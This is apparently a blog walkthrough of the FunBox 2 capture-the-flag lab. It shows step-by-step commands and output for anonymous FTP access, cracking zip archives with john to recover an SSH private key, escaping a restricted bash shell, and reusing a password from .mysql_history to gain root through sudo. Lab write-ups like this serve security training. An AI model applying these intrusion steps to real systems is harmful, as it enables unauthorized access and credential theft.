I really like the challenge FunBox: 1. That's why I decided to go for the part-2 as well, So without wasting our time, lets get started.

IP of the target : 192.168.1.106

As usual I started with nmap to find open ports and services using the command shown below:

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb2]
└──╼ $nmap -sC -sV -Pn -p- -T4 --max-rate=1000 192.168.1.106
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-22 19:57 IST
Nmap scan report for funbox2.lan (192.168.1.106)
Host is up (0.00024s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 anna.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 ariel.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:52 bud.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:58 cathrine.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 homer.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 jessica.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 john.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 marge.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 miriam.zip
| -r--r--r--   1 ftp      ftp          1477 Jul 25 10:44 tom.zip
| -rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
|_-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 zlatan.zip
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
|   256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_  256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/logs/

This looks really nice, lot of zip files , So I started my enumeration from port 21/FTP because anonymous login was allowed.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb2]
└──╼ $ftp 192.168.1.106
Connected to 192.168.1.106.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.1.106]
Name (192.168.1.106:m4g1c14n): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
.
.
.
.
ftp> ls -al
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 Jul 25 11:07 .
drwxr-xr-x   2 ftp      ftp          4096 Jul 25 11:07 ..
-rw-r--r--   1 ftp      ftp           153 Jul 25 11:06 .@admins
-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 anna.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 ariel.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:52 bud.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:58 cathrine.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 homer.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 jessica.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 john.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 marge.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 miriam.zip
-r--r--r--   1 ftp      ftp          1477 Jul 25 10:44 tom.zip
-rw-r--r--   1 ftp      ftp           114 Jul 25 11:07 .@users
-rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 zlatan.zip

You can see some more files are there ( hidden), I downloaded all the files in my local system, I started with the file .@admins and found that it is base64 encoded , after decoding it looks like

└──╼ $cat .@admins | base64 -d
Hi Admins,

be carefull with your keys. Find them in %yourname%.zip.
The passwords are the old ones.

Regards
root

means these .zip files have private keys of different users, So I started to extract all the zip files and found that all of them are password protected, No worries we can use zip2john and then john to crack those hashes, So one by one for each .zip files I started to store hashes in different files using the following command:

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb2]
└──╼ $/usr/sbin/zip2john anna.zip > anna
ver 2.0 efh 5455 efh 7875 anna.zip/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6

I used the same command for every zip file and started to find the password using john, after trying on every hash, I found the password of tom.zip file and cathrina.zip file using john and rockyou.txt wordlist.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/john/run]
└──╼ $john --wordlist=../../../rockyou.txt ../../fb2/tom
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire           (tom.zip/id_rsa)
1g 0:00:00:00 DONE (2020-09-22 20:50) 3.225g/s 26425p/s 26425c/s 26425C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Using this password I extracted the tom.zip file and now I have id_rsa file, we can use private keys to login into the system as user tom by applying correct permission on id_rsa.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb2]
└──╼ $unzip tom.zip 
Archive:  tom.zip
[tom.zip] id_rsa password: 
  inflating: id_rsa                  
┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb2]
└──╼ $chmod 400 id_rsa 

Now I simply used the command ssh tom@192.168.1.106 -i id_rsa and I was inside the system but while changing the directory it gives an error "-rbash: cd: restricted" and we can easily bypass this using ssh tom@192.168.1.106 -i id_rsa -t "bash --noprofile", just after getting into the system I found that there is only one user, I checked for all the files including hidden ones in the home directory and found a interesting file .

tom@funbox2:~$ ls -al
total 40
drwxr-xr-x 5 tom  tom  4096 Jul 25 12:39 .
drwxr-xr-x 3 root root 4096 Jul 25 09:53 ..
-rw------- 1 tom  tom    64 Sep 22 15:24 .bash_history
-rw-r--r-- 1 tom  tom   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 tom  tom  3771 Apr  4  2018 .bashrc
drwx------ 2 tom  tom  4096 Jul 25 09:55 .cache
drwx------ 3 tom  tom  4096 Jul 25 09:55 .gnupg
**-rw------- 1 tom  tom   295 Jul 25 12:04 .mysql_history**
-rw-r--r-- 1 tom  tom   807 Apr  4  2018 .profile
drwx------ 2 tom  tom  4096 Jul 25 11:18 .ssh
-rw-r--r-- 1 tom  tom     0 Jul 25 09:55 .sudo_as_admin_successful
-rw------- 1 tom  tom     0 Jul 25 12:39 .viminfo

I read the file using cat command and found something new.

tom@funbox2:~$ cat .mysql_history
.
.
.
insert\040into\040support\040(tom,\040xx11yy22!);

For some time I just ignored this string and started to look for other ways to get root and used the command sudo -l to check for the user privileges but it was asking for the password, I again started my enumeration to find the tom's password because it was clear that user tom has some kind of permission as file ".sudo_as_admin_successful" was in the home folder, I again go back to the .mysql_history file and used that string as the password but failed next I used the string "xx11yy22!" as tom's password and this time user privileges were displayed.

tom@funbox2:~$ sudo -l
[sudo] password for tom: 
Matching Defaults entries for tom on funbox2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
    (ALL : ALL) ALL
tom@funbox2:~$ 

I execute the command sudo su and finally got root access.

tom@funbox2:~$ sudo su
root@funbox2:/home/tom# cd /root
root@funbox2:~# ls
flag.txt

And this completed our challenge, Hope you like the walkthrough :)

NOTE: The awesome artwork used in this article was created by Anton Fritsler.